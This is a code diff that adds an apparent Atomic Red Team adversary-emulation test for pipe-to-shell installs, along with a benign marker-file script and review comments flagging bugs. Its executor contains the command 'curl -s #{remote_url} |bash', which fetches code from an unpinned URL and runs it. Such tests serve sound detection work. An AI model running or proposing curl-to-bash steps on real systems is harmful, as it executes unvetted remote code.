diff --git a/atomics/T1059.004/T1059.004.yaml b/atomics/T1059.004/T1059.004.yaml
index bfc2a026..234ec392 100644
--- a/atomics/T1059.004/T1059.004.yaml
+++ b/atomics/T1059.004/T1059.004.yaml
@@ -199,3 +199,33 @@ atomic_tests:
 echo $ART |/bin/bash
 cleanup_command: |
 unset ART
+- name: Detecting pipe-to-shell
+ description: |
+ An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage of this BLIND install method and selectively running extra commands in the install script for those who DO pipe to bash and not for those who DO NOT. This test uses curl to download the pipe-to-shell.sh script, the first time without piping it to bash and the second piping it into bash which executes the echo command.
+ supported_platforms:
+ - linux
+ input_arguments:
+ remote_url:
+ description: url of remote payload
+ type: Url
+ default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh
+ dependency_executor_name: bash
+ dependencies:
+ - description: |
+ Check if running on a Debian based machine.
+ prereq_command: |
+ if grep -iq "debian\|ubuntu\|kali\|mint" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi
+ if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
+ get_prereq_command: |
+ apt update && apt install -y curl
+ executor:
+ name: bash
+ elevation_required: false
+ command: |
+ cd /tmp
+ curl -s #{remote_url}
+ ls -la /tmp/art.txt
+ curl -s #{remote_url} |bash
+ ls -la /tmp/art.txt
+ cleanup_command: |
+ rm /tmp/art.txt
diff --git a/atomics/T1059.004/src/pipe-to-shell.sh b/atomics/T1059.004/src/pipe-to-shell.sh
new file mode 100755
index 00000000..ed0c08fd
--- /dev/null
+++ b/atomics/T1059.004/src/pipe-to-shell.sh
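Review bot: The executor's `curl -s #{remote_url} |bash` line runs whatever the URL returns, and the default points at the unpinned `master` branch, so the test's behavior is whatever that file contains at run time rather than the `src/pipe-to-shell.sh` added in this same commit; curl is also run without `-f`, so an HTTP error body would be handed to bash as well. Consider pinning the default to a specific revision (`https://raw.githubusercontent.com/redcanaryco/atomic-red-team/<COMMIT_SHA>/atomics/T1059.004/src/pipe-to-shell.sh`, placeholder) or pointing it at the local copy shipped with the atomic, and changing the two fetch lines to `curl -sf "#{remote_url}"` and `curl -sf "#{remote_url}" | bash`. The cleanup `rm /tmp/art.txt` exits non-zero whenever the script's else branch ran and the file was never written, so `rm -f /tmp/art.txt` would avoid a spurious cleanup failure. The first `ls -la /tmp/art.txt` is expected to fail by design; stating that in the description would keep its non-zero exit from being read as a broken test.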
@@ -0,0 +1,13 @@
+#!/bin/sh
+
+# This script detects when it's being curl downloaded if it is being piped into
+# bash. The if switch -t detects a file (descriptor) that is associated with a
+# terminal device. 0 = downloaded 1 = being piped
+
+if [ -t 1 ]
+then
+ echo -e "\nBeing piped\n"
+ echo "Atomic Red Team was here... T1059.004" > /tmp/art.txt
+else
+ echo -e "\nNOT being piped\n"
+fi
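Review bot: `[ -t 1 ]` tests whether standard output is a terminal, not whether the script arrived on a pipe, so the header comment `0 = downloaded 1 = being piped` misdescribes the check; if the test harness captures output (fd 1 not a tty), the else branch runs, `/tmp/art.txt` is never written, and both `ls -la /tmp/art.txt` calls in the accompanying atomic fail. The comment should state the actual condition, e.g. `# [ -t 1 ] is true only when stdout is attached to a terminal; under a harness that captures output it is false and the marker file is not written.` Separately, `echo -e` is not POSIX and the shebang is `#!/bin/sh`; on the Debian-family targets this test requires, /bin/sh is dash, which prints `-e` literally, so use `printf '\nBeing piped\n\n'` (and likewise for the else branch) or change the shebang to `#!/bin/bash`.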